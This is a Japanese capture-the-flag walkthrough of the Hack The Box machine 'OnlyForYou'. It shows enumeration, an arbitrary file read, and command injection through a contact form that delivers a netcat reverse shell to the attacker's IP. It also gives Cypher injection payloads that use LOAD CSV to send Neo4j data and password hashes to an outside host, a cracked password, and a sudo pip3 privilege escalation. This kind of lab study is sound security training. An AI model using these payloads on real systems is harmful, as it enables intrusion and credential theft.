HTB_onlyforyou - meruneru/tech_memo GitHub Wiki
#script無し、全探索
nmap -Pn -p- --min-rate 5000 -oN nmap.txt onlyforyou.htb
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
# その後、ポート指定して、スクリプト検索
nmap -sV -sC -Pn -p 22,80 --min-rate 5000 -oN nmap.txt onlyforyou.htb
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e8:83:e0:a9:fd:43:df:38:19:8a:aa:35:43:84:11:ec (RSA)
| 256 83:f2:35:22:9b:03:86:0c:16:cf:b3:fa:9f:5a:cd:08 (ECDSA)
|_ 256 44:5f:7a:a3:77:69:0a:77:78:9b:04:e0:9f:11:db:80 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://only4you.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
UDP
$ sudo nmap -sU -top-ports 20 onlyforyou.htb
http://only4you.htb/ にリダイレクトされるので、/etc/hostsに追加してアクセスする。
サイトに載っていた人名 Walter White Sarah Jhonson William Anderson Amanda Jepson
特に見つからず。
┌──(kali㉿kali)-[~/htb/onlyforyou]
└─$ gobuster dir -u only4you.htb -w ~/SecLists/Discovery/Web-Content/common.txt
┌──(kali㉿kali)-[~/htb/onlyforyou]
└─$ gobuster dir -u beta.only4you.htb -w ~/SecLists/Discovery/Web-Content/common.txt
===============================================================
2023/08/14 23:29:25 Starting gobuster in directory enumeration mode
===============================================================
/download (Status: 405) [Size: 683]
/list (Status: 200) [Size: 5934]
/resize (Status: 200) [Size: 2984]
/source (Status: 200) [Size: 12127]
Progress: 4701 / 4703 (99.96%)
サブドメインが無いか探索すると、beta というサブドメインがあることがわかった。
$ sudo wfuzz -w /home/kali/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -c -f wfuzz-output.txt -u "only4you.htb" -H "HOST:FUZZ.only4you.htb" --hc 301 =====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000033: 200 51 L 145 W 2190 Ch "beta - beta"
/etc/hostsにbeta.only4you.htbを追加してアクセスする。
ソースコードをダウンロードできる。
PILでresize, convertしていることがわかるが、PILの脆弱性で使えそうなものはなかった。
/downloadにて、filenameに絶対パスでサーバ内のファイルパスを渡せば、任意ファイルを取得できそうなことがわかる。
/downloadへのPOSTは、resizeページで画像をアップロードしたあと、/listページでボタンを押下すると投げられる。
@app.route('/download', methods=['POST'])
def download():
image = request.form['image']
filename = posixpath.normpath(image)
if '..' in filename or filename.startswith('../'):
flash('Hacking detected!', 'danger')
return redirect('/list')
if not os.path.isabs(filename):
filename = os.path.join(app.config['LIST_FOLDER'], filename)
try:
if not os.path.isfile(filename):
flash('Image doesn\'t exist!', 'danger')
return redirect('/list')
except (TypeError, ValueError):
raise BadRequest()
return send_file(filename, as_attachment=True)
burpsuiteでPOSTを編集すると、/etc/passwdが想定通りにファイルをゲットできた。
POST /download HTTP/1.1
Host: beta.only4you.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 17
Origin: http://beta.only4you.htb
Connection: close
Referer: http://beta.only4you.htb/list
Cookie: session=eyJfZmxhc2hlcyI6W3siIHQiOlsiZGFuZ2VyIiwiSW1hZ2UgaXMgdG9vIHNtYWxsISBNaW5pbXVtIHNpemUgbmVlZHMgdG8gYmUgNzAweDcwMCJdfV19.ZNsJJw.wkaMxVRUjM9Yd8Wz-JGbRV4MM7c
Upgrade-Insecure-Requests: 1
image=/etc/passwd
root, john, neo4j, devの4アカウントあるみたいだ。
会社役員リストから考えるとjohnが怪しそうではある。
Walter White Sarah Jhonson William Anderson Amanda Jepson
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
john:x:1000:1000:john:/home/john:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:113:117:MySQL Server,,,:/nonexistent:/bin/false
neo4j:x:997:997::/var/lib/neo4j:/bin/bash
dev:x:1001:1001::/home/dev:/bin/bash
fwupd-refresh:x:114:119:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
_laurel:x:996:996::/var/log/laurel:/bin/false
nginxの設定ファイルも取得してみる。
https://medium.com/adrixus/beginners-guide-to-nginx-configuration-files-527fcd6d5efd
Server Configuration
- /etc/nginx: The NGINX configuration directory. All of the Nginx configuration files reside here.
- /etc/nginx/nginx.conf: The main NGINX configuration file. This can be modified to make changes to the NGINX global configuration.
- /etc/nginx/sites-available/: The directory where per-site “server blocks” can be stored. NGINX will not use the configuration files found in this directory unless they are linked to the sites-enabled directory (see below). Typically, all server block configuration is done in this directory, and then enabled by linking to the other directory.
- /etc/nginx/sites-enabled/: The directory where enabled per-site “server blocks” are stored. Typically, these are created by linking to configuration files found in the sites-available directory.
- /etc/nginx/snippets: This directory contains configuration fragments that can be included elsewhere in the NGINX configuration. Potentially repeatable configuration segments are good candidates for refactoring into snippets.
server {
listen 80;
return 301 http://only4you.htb$request_uri;
}
server {
listen 80;
server_name only4you.htb;
location / {
include proxy_params;
proxy_pass http://unix:/var/www/only4you.htb/only4you.sock;
}
}
server {
listen 80;
server_name beta.only4you.htb;
location / {
include proxy_params;
proxy_pass http://unix:/var/www/beta.only4you.htb/beta.sock;
}
}
server {
listen 80;
return 301 http://only4you.htb$request_uri;
}
server {
listen 80;
server_name only4you.htb;
location / {
include proxy_params;
proxy_pass http://unix:/var/www/only4you.htb/only4you.sock;
}
}
server {
listen 80;
server_name beta.only4you.htb;
location / {
include proxy_params;
proxy_pass http://unix:/var/www/beta.only4you.htb/beta.sock;
}
}
/var/www/only4you.htb/以下にもbetaと同じようにサービスがある。 /var/www/only4you.htb/app.py, /var/www/only4you.htb/form.pyを取得してみる
トップページ以下のコンタクトのメールアドレスのドメイン部分に、 コマンドインジェクションの脆弱性がある。
for domain in domains:
result = run([f"dig txt {domain}"], shell=True, stdout=PIPE)
POST / HTTP/1.1
Host: only4you.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 97
Origin: http://only4you.htb
Connection: close
Referer: http://only4you.htb/
Cookie: session=eyJfZmxhc2hlcyI6W3siIHQiOlsiZGFuZ2VyIiwiWW91IGFyZSBub3QgYXV0aG9yaXplZCEiXX1dfQ.ZNsp1A.I4KGKeqGJZ4JU1ymvvcv0sokmkk
Upgrade-Insecure-Requests: 1
name=myname&email=myemail%40example.com|curl+http%3a//10.10.14.16&subject=subject&message=message
サーバからローカルに、curlが実行できた。
┌──(kali㉿kali)-[~/htb/onlyforyou/extr/top]
└─$ nc -lnvp 80 1 ⨯
listening on [any] 80 ...
connect to [10.10.14.16] from (UNKNOWN) [10.10.11.210] 47758
GET / HTTP/1.1
Host: 10.10.14.16
User-Agent: curl/7.68.0
Accept: */*
リバースシェルは下記サイトで生成して、使うとうまくいった。 https://www.revshells.com/
nc -lvnp 4242
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.14.16 4242 >/tmp/f
POST / HTTP/1.1
Host: only4you.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 197
Origin: http://only4you.htb
Connection: close
Referer: http://only4you.htb/
Cookie: session=eyJfZmxhc2hlcyI6W3siIHQiOlsiZGFuZ2VyIiwiWW91IGFyZSBub3QgYXV0aG9yaXplZCEiXX1dfQ.ZNsp1A.I4KGKeqGJZ4JU1ymvvcv0sokmkk
Upgrade-Insecure-Requests: 1
name=myname&email=myemail%40example.com|rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Cbash%20-i%202%3E%261%7Cnc%2010.10.14.16%204242%20%3E%2Ftmp%2Ff&subject=subject&message=message
www-data@only4you:~$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@only4you:~$ env
env
SERVER_SOFTWARE=gunicorn/20.0.4
PWD=/var/www
LOGNAME=www-data
HOME=/var/www
LANG=en_US.UTF-8
INVOCATION_ID=2e8311118c614b4c9b192e458a396613
USER=www-data
SHLVL=2
JOURNAL_STREAM=9:38339
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
OLDPWD=/var/www/only4you.htb
_=/usr/bin/env
#netstat でリッスン中のポートを調べる。
3000, 8001 ポートがあやしい。
www-data@only4you:~$ netstat -ntlp
netstat -ntlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 1027/nginx: worker
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8001 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN -
tcp6 0 0 127.0.0.1:7474 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 127.0.0.1:7687 :::* LISTEN -
victim側にchiselをダウンロードさせる。 (--limit-rateを制限をかけないと、途中で止まってします。)
$ wget --limit-rate=1k --tries=3 http://10.10.14.16:8000/chisel.zip
chiselで3000, 8001をローカルにポートフォワードする。
$ chisel server -p 8005 --reverse
# ./chisel client 10.10.14.16:8005 R:3000:127.0.0.1:3000 R:8001:127.0.0.1:8001
localhostに向けてnmapをする。
┌──(kali㉿kali)-[~/htb/onlyforyou]
└─$ nmap -sV -sC -Pn -p 3000,8001 --min-rate 5000 -oN nmap.txt localhost
PORT STATE SERVICE VERSION
3000/tcp open ppp?
| fingerprint-strings:
| GenericLines, Help, RTSPRequest:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Content-Type: text/html; charset=UTF-8
| Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
| Set-Cookie: i_like_gogs=cc2879fa9ec6da03; Path=/; HttpOnly
| Set-Cookie: _csrf=x4UeViA2q-FDzDPdXZJzVBJIlTY6MTY5MjE0ODg2MTc3NTA3NDIxNQ; Path=/; Do
main=127.0.0.1; Expires=Thu, 17 Aug 2023 01:21:01 GMT; HttpOnly
| X-Content-Type-Options: nosniff
...
8001/tcp open http Gunicorn 20.0.4
|_http-server-header: gunicorn/20.0.4
| http-title: Login
|_Requested resource was /login
1 service unrecognized despite returning data. If you know the service/version, please sub
mit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
...
下記にアクセスできる。 http://localhost:3000 http://localhost:8001
8001の方はadmin/adminでは入れた。
サイト内を見ると、バックグラウンドにDBがあることがわかる。 また、最近neo4jというDBに移行したみたいだ。
neo4jでinjectionを検索してみると、下記が見つかった。 https://book.hacktricks.xyz/pentesting-web/sql-injection/cypher-injection-neo4j#extracting-information
searchクリエに下記をURLエンコードしたものを入れることで、 サーバ情報を取得できた。
' OR 1=1 WITH 1 as a CALL dbms.components() YIELD name, versions, edition UNWIND versions as version LOAD CSV FROM 'http://10.10.14.16:80/?version=' + version + '&name=' + name + '&edition=' + edition as l RETURN 0 as _0 //
┌──(kali㉿kali)-[~/htb/onlyforyou]
└─$ nc -lnvp 80
listening on [any] 80 ...
connect to [10.10.14.16] from (UNKNOWN) [10.10.11.210] 38482
GET /?version=5.6.0&name=Neo4j Kernel&edition=community HTTP/1.1
User-Agent: NeoLoadCSV_Java/17.0.6+10-Ubuntu-0ubuntu120.04.1
Host: 10.10.14.16
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
ラベルを見ると、user, employeeの2つあった。
'OR 1=1 WITH 1 as a CALL db.labels() yield label LOAD CSV FROM 'http://10.10.14.16/?label='+label as l RETURN 0 as _0 //
┌──(kali㉿kali)-[~/htb/onlyforyou]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.210 - - [15/Aug/2023 22:04:44] "GET /?label=user HTTP/1.1" 200 -
10.10.11.210 - - [15/Aug/2023 22:04:45] "GET /?label=employee HTTP/1.1" 200 -
10.10.11.210 - - [15/Aug/2023 22:04:46] "GET /?label=user HTTP/1.1" 200 -
10.10.11.210 - - [15/Aug/2023 22:04:46] "GET /?label=employee HTTP/1.1" 200 -
label=userを指定して、情報を列挙する。
' OR 1=1 WITH 1 as a MATCH (f:user) UNWIND keys(f) as p LOAD CSV FROM 'http://10.10.14.16/?' + p +'='+toString(f[p]) as l RETURN 0 as _0 //
10.10.11.210 - - [15/Aug/2023 22:10:46] "GET /?username=admin HTTP/1.1" 200 -
10.10.11.210 - - [15/Aug/2023 22:10:47] "GET /?password=a85e870c05825afeac63215d5e845aa7f3088cd15359ea88fa4061c6411c55f6 HTTP/1.1" 200 -
10.10.11.210 - - [15/Aug/2023 22:10:48] "GET /?username=john HTTP/1.1" 200 -
10.10.11.210 - - [15/Aug/2023 22:10:48] "GET /?password=8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918 HTTP/1.1" 200 -
10.10.11.210 - - [15/Aug/2023 22:10:49] "GET /?username=admin HTTP/1.1" 200 -
10.10.11.210 - - [15/Aug/2023 22:10:49] "GET /?password=a85e870c05825afeac63215d5e845aa7f3088cd15359ea88fa4061c6411c55f6 HTTP/1.1" 200 -
10.10.11.210 - - [15/Aug/2023 22:10:50] "GET /?username=john HTTP/1.1" 200 -
10.10.11.210 - - [15/Aug/2023 22:10:51] "GET /?password=8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918 HTTP/1.1" 200 -
10.10.11.210 - - [15/Aug/2023 22:10:51] "GET /?username=admin HTTP/1.1" 200 -
10.10.11.210 - - [15/Aug/2023 22:10:52] "GET /?password=a85e870c05825afeac63215d5e845aa7f3088cd15359ea88fa4061c6411c55f6 HTTP/1.1" 200 -
10.10.11.210 - - [15/Aug/2023 22:10:53] "GET /?username=john HTTP/1.1" 200 -
パスワードはcrackstationでも解析できる。 https://crackstation.net/
johnのパスワードは ThisIs4You
上記でSSHできて、ユーザーフラグゲット!
"sudo -l"をみると、pip3を使って、3000ポート(Gogs)からファイルをダウンロードすることができるみたいだ。
-bash-5.0$ cat user.txt
-bash-5.0$ sudo -l
Matching Defaults entries for john on only4you:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User john may run the following commands on only4you:
(root) NOPASSWD: /usr/bin/pip3 download http\://127.0.0.1\:3000/*.tar.gz
"pip download exlpoit"と調べると下記サイトがヒットした。
https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/pip-download-code-execution/
上記方法でパッケージを作成(/usr/bin/bashにsetuid bitを立てる)し、 Gogs( ID: john, PW: ThisIs4You) でリポジトリを作成して、 johnのターミナルからGogsにビルドパッケージをpushする。
push後に、bashのパーミッションが変更されているので、 bash -pでrootが取れた
-bash-5.0$ ls -l /usr/bin/bash
-rwsr-xr-x 1 root root 1183448 Apr 18 2022 /usr/bin/bash
bash-5.0$ bash -p
bash-5.0# cat /root/root.txt